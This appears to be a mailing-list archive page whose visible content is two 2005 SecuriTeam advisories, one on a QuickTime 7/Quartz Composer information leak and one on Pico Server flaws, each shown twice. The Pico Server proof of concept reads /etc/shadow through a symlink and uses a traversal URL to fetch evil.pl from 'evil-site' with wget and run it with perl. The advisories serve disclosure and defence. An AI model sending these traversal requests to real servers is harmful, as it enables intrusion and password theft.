[UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition - msg#00055

Previous Message by Date: click to view message preview

[NEWS] Quartz Composer / QuickTime 7 Information Leakage

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Quartz Composer / QuickTime 7 Information Leakage ------------------------------------------------------------------------ SUMMARY Quartz Composer files are created with the Quartz Composer application included with the developer tools. The compositions (QTZ files) it creates can be used as screen savers, viewed as they are in the application or embedded as QT atoms in a '.mov' container. As such, they can be viewed in a wide-ranging array of environments, including a web browser, Keynote 2 and the Finder. Compositions have access to a number of powerful tools (patches), each providing or acting-upon information, ultimately resulting in a graphic composition. The design assumption seems to be that these details should always be contained within the presentation. However, by combining patches that provide advanced system information with patches that load information from the Internet, a malicious '.mov' file (viewed for example by the QuickTime web plugin) can leak this information to an external host. This issue has not been addressed by Apple yet, and because details of the potential exploit appeared in a public forum shortly after David had notified the vendor, a fix may still be some time away. A temporary work-around is disabling the QuickTime plugin and treating Quartz Composer files with suspicion. DETAILS Vulnerable Systems: * Apple Mac OS X 10.4 (QuickTime 7) Immune Systems: * Apple Mac OS X 10.3.9 (QuickTime 6.5, 7) * QuickTime for Windows Impact: The information that can be leaked by this method includes (but may not be limited to): * Local user name (long and short) * Computer name * Local IP * OS / kernel version * CPU / RAM / GPU configuration * Names (human-readable) of Bonjour services on the local network * Local or system time * Volume of audio input * Lists of images (including pdfs) matching arbitrary spotlight queries * Lists of images (including pdfs) in specific directories (relative to / or ~) * The existence of image and movie files can indicate the existence of certain software packages This information can be used for profiling of potential victims, for further use in attacks against the user's system or phising related social engineering. Proof of Concept: A proof-of-concept in the form of a Quartz Composer composition embedded in a '.mov' file is available at the following link. Please see that document for more information: <http://remahl.se/david/vuln/018/demo.html> http://remahl.se/david/vuln/018/demo.html. Technical Details: The basic attack works as follows: 1. A patch providing the information (for example the Host Info patch) is created (A) 2. The output of (A) is connected to a JavaScript patch which uses encodeURIComponent() to URI encode the string (B). 3. The output of (B) is connected to a String Printer which results in a URI, for example (C) 4. The output of (C) is connected to the URL input connection of either the Image Downloader patch or the RSS Feed patch. (D) 5. The output of (D) must be used somehow, otherwise this part of the patch graph will not be used. Rendering the output (via a String to Image) to a 0-sized billboard is fine. 6. When the (D) patch is activated, it will access the URI (output of (C)), thus leaking the restricted information to an HTTP host of the attacker's choice. Vendor contact: Apple Computer's security team was contacted with information about the issue on 2005-05-06. Following a discussion of this problem on the public quartzcomposer-dev mailinglist (initiated by a third-party), the full details of the problems were released on May 11. Vendor response: Apple Computer - 2005-05-10, 04:50 UTC: Confirmed receipt of problem report(did not confirm issue). ADDITIONAL INFORMATION The information has been provided by <mailto:vuln@xxxxxxxxx> David Remahl. The original article can be found at: <http://remahl.se/david/vuln/018/> http://remahl.se/david/vuln/018/ ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next Message by Date: click to view message preview

[UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal) ------------------------------------------------------------------------ SUMMARY " <http://pserv.sourceforge.net/> Pico Server (pServ) is written in portable C (K&R style so it can compile on older compilers too) and sports several options that by means of #define statements can customize the behavior, the performance and the feature set so to be able to fit better the the requisites." Information Disclosure vulnerabilities where found in Pico server that allow attackers to retrieve information from the local computer. A directory traversal vulnerability found in the Pico server allows attackers to execute arbitrary code. DETAILS Vulnerable Systems: * Pico Server version 3.2 and prior (Vulnerable to all vulnerabilities) * Pico Server version 3.3 (Vulnerable to local information disclosure) Immune Systems: * Pico Server version 3.3 (Immune to remote information disclosure and directory traversal) Local Information Disclosure: pServ does not distinguish between normal files and from symbolic-links. Unfortunately it only check the link itself but not check if the symbolic-link target is still in the web-root. That is why an attacker with access to a directory on the web server (e.g. via FTP) can place a symbolic link to any file on the server. The attacker can then retrieve that file (if pServe have the permission to read it) through the web server by navigating his browser to that link. Proof of Concept Retrieving /etc/shadow if pServe runs as root: 1. As user go to your web-directory e.g.: cd /usr/local/var/www/userdir 2. Create a link to /etc/shadow: ln -s /etc/shadow 3. Retrieve the shadow file by pointing your browser to http://vuln-host:2000/userdir/shadow Workaround pServe should run as a user with minimal privileges. Files that should not be read by unprivileged users should have their permissions set accordingly. Remote Information Disclosure: pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as cgi-scripts. The server does not check correctly whether a user accesses a file in cgi-bin and gives away the source instead of executing it. The server only checks, whether a file is in cgi-bin by checking whether the beginning of the directory part of the URL matches "cgi-bin". A user can circumvent this by asking for /somedir/../cgi-bin/ and therefore is able to retrieve the complete source-code of all scripts in cgi-bin. Proof of Concept: This URL lets us download the source of test.pl instead of executing it. http://vuln-host:2000/somedir/../cgi-bin/test.pl Vendor Status: The developers have released version 3.3. This version should fix the problem. Directory Traversal: Only if pServ is compiled with support for CGI-BIN a remote attacker is able to execute any program (with pServ permissions) on the server by traversing out of the cgi-bin directory. The CGI-BIN support is searching in the URL for the directory cgi-bin and if it found, the script are treated as CGI scripts. To avoid that a user traverses out of the cgi-bin using traditional /../, pServ parses the requested URL. It increases a counter by one if it parses a / (new subdirectory) and decreases the counter if it parses /../. If the counter goes below zero the URL is rejected as illegal. Unfortunately an attacker can avoid being rejected, just by using enough / in the URL (without directory names between them), so he can traverse out of the cgi-bin by adding some /../ . This allow the attacker execute any program on the server (with pServ permissions). Proof of Concept: The following url downloads a script (or executable) to the server: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q +http://evil-site/evil.pl/+-O+/tmp/evil.pl This is how the script can be executed afterwards: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl Vendor Status: The developers have released version 3.3. This version should fix the problem. CVE Information: <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365> CAN-2005-1365 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1366> CAN-2005-1366 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1367> CAN-2005-1367 Disclosure Timeline: 2005-04-29 Vulnerabilities found 2005-05-02 First attempt to inform developers. CAN-number assigned 2005-05-04 Second attempt to inform developers 2005-05-16 New version released two vulnerabilities was fixed (Remote Information discloser and Directory Traversal) One Vulnerability was not fixed (Local Information Discloser). Advisory published ADDITIONAL INFORMATION The information has been provided by <mailto:bugtraq@xxxxxxxxxxxxxxxxxx> Claus R. F. Overbeck. The original article can be found at: <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010, <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011 and <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012 ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Previous Message by Thread: click to view message preview

[NEWS] Quartz Composer / QuickTime 7 Information Leakage

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Quartz Composer / QuickTime 7 Information Leakage ------------------------------------------------------------------------ SUMMARY Quartz Composer files are created with the Quartz Composer application included with the developer tools. The compositions (QTZ files) it creates can be used as screen savers, viewed as they are in the application or embedded as QT atoms in a '.mov' container. As such, they can be viewed in a wide-ranging array of environments, including a web browser, Keynote 2 and the Finder. Compositions have access to a number of powerful tools (patches), each providing or acting-upon information, ultimately resulting in a graphic composition. The design assumption seems to be that these details should always be contained within the presentation. However, by combining patches that provide advanced system information with patches that load information from the Internet, a malicious '.mov' file (viewed for example by the QuickTime web plugin) can leak this information to an external host. This issue has not been addressed by Apple yet, and because details of the potential exploit appeared in a public forum shortly after David had notified the vendor, a fix may still be some time away. A temporary work-around is disabling the QuickTime plugin and treating Quartz Composer files with suspicion. DETAILS Vulnerable Systems: * Apple Mac OS X 10.4 (QuickTime 7) Immune Systems: * Apple Mac OS X 10.3.9 (QuickTime 6.5, 7) * QuickTime for Windows Impact: The information that can be leaked by this method includes (but may not be limited to): * Local user name (long and short) * Computer name * Local IP * OS / kernel version * CPU / RAM / GPU configuration * Names (human-readable) of Bonjour services on the local network * Local or system time * Volume of audio input * Lists of images (including pdfs) matching arbitrary spotlight queries * Lists of images (including pdfs) in specific directories (relative to / or ~) * The existence of image and movie files can indicate the existence of certain software packages This information can be used for profiling of potential victims, for further use in attacks against the user's system or phising related social engineering. Proof of Concept: A proof-of-concept in the form of a Quartz Composer composition embedded in a '.mov' file is available at the following link. Please see that document for more information: <http://remahl.se/david/vuln/018/demo.html> http://remahl.se/david/vuln/018/demo.html. Technical Details: The basic attack works as follows: 1. A patch providing the information (for example the Host Info patch) is created (A) 2. The output of (A) is connected to a JavaScript patch which uses encodeURIComponent() to URI encode the string (B). 3. The output of (B) is connected to a String Printer which results in a URI, for example (C) 4. The output of (C) is connected to the URL input connection of either the Image Downloader patch or the RSS Feed patch. (D) 5. The output of (D) must be used somehow, otherwise this part of the patch graph will not be used. Rendering the output (via a String to Image) to a 0-sized billboard is fine. 6. When the (D) patch is activated, it will access the URI (output of (C)), thus leaking the restricted information to an HTTP host of the attacker's choice. Vendor contact: Apple Computer's security team was contacted with information about the issue on 2005-05-06. Following a discussion of this problem on the public quartzcomposer-dev mailinglist (initiated by a third-party), the full details of the problems were released on May 11. Vendor response: Apple Computer - 2005-05-10, 04:50 UTC: Confirmed receipt of problem report(did not confirm issue). ADDITIONAL INFORMATION The information has been provided by <mailto:vuln@xxxxxxxxx> David Remahl. The original article can be found at: <http://remahl.se/david/vuln/018/> http://remahl.se/david/vuln/018/ ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next Message by Thread: click to view message preview

[UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal) ------------------------------------------------------------------------ SUMMARY " <http://pserv.sourceforge.net/> Pico Server (pServ) is written in portable C (K&R style so it can compile on older compilers too) and sports several options that by means of #define statements can customize the behavior, the performance and the feature set so to be able to fit better the the requisites." Information Disclosure vulnerabilities where found in Pico server that allow attackers to retrieve information from the local computer. A directory traversal vulnerability found in the Pico server allows attackers to execute arbitrary code. DETAILS Vulnerable Systems: * Pico Server version 3.2 and prior (Vulnerable to all vulnerabilities) * Pico Server version 3.3 (Vulnerable to local information disclosure) Immune Systems: * Pico Server version 3.3 (Immune to remote information disclosure and directory traversal) Local Information Disclosure: pServ does not distinguish between normal files and from symbolic-links. Unfortunately it only check the link itself but not check if the symbolic-link target is still in the web-root. That is why an attacker with access to a directory on the web server (e.g. via FTP) can place a symbolic link to any file on the server. The attacker can then retrieve that file (if pServe have the permission to read it) through the web server by navigating his browser to that link. Proof of Concept Retrieving /etc/shadow if pServe runs as root: 1. As user go to your web-directory e.g.: cd /usr/local/var/www/userdir 2. Create a link to /etc/shadow: ln -s /etc/shadow 3. Retrieve the shadow file by pointing your browser to http://vuln-host:2000/userdir/shadow Workaround pServe should run as a user with minimal privileges. Files that should not be read by unprivileged users should have their permissions set accordingly. Remote Information Disclosure: pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as cgi-scripts. The server does not check correctly whether a user accesses a file in cgi-bin and gives away the source instead of executing it. The server only checks, whether a file is in cgi-bin by checking whether the beginning of the directory part of the URL matches "cgi-bin". A user can circumvent this by asking for /somedir/../cgi-bin/ and therefore is able to retrieve the complete source-code of all scripts in cgi-bin. Proof of Concept: This URL lets us download the source of test.pl instead of executing it. http://vuln-host:2000/somedir/../cgi-bin/test.pl Vendor Status: The developers have released version 3.3. This version should fix the problem. Directory Traversal: Only if pServ is compiled with support for CGI-BIN a remote attacker is able to execute any program (with pServ permissions) on the server by traversing out of the cgi-bin directory. The CGI-BIN support is searching in the URL for the directory cgi-bin and if it found, the script are treated as CGI scripts. To avoid that a user traverses out of the cgi-bin using traditional /../, pServ parses the requested URL. It increases a counter by one if it parses a / (new subdirectory) and decreases the counter if it parses /../. If the counter goes below zero the URL is rejected as illegal. Unfortunately an attacker can avoid being rejected, just by using enough / in the URL (without directory names between them), so he can traverse out of the cgi-bin by adding some /../ . This allow the attacker execute any program on the server (with pServ permissions). Proof of Concept: The following url downloads a script (or executable) to the server: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q +http://evil-site/evil.pl/+-O+/tmp/evil.pl This is how the script can be executed afterwards: http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl Vendor Status: The developers have released version 3.3. This version should fix the problem. CVE Information: <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365> CAN-2005-1365 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1366> CAN-2005-1366 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1367> CAN-2005-1367 Disclosure Timeline: 2005-04-29 Vulnerabilities found 2005-05-02 First attempt to inform developers. CAN-number assigned 2005-05-04 Second attempt to inform developers 2005-05-16 New version released two vulnerabilities was fixed (Remote Information discloser and Directory Traversal) One Vulnerability was not fixed (Local Information Discloser). Advisory published ADDITIONAL INFORMATION The information has been provided by <mailto:bugtraq@xxxxxxxxxxxxxxxxxx> Claus R. F. Overbeck. The original article can be found at: <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010, <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011 and <http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012> http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012 ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Subject: [UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition - msg#00055

List: security.securiteam

Previous Message by Date: click to view message preview

Next Message by Date: click to view message preview

Previous Message by Thread: click to view message preview

Next Message by Thread: click to view message preview

Recent Threads

Recent Comments: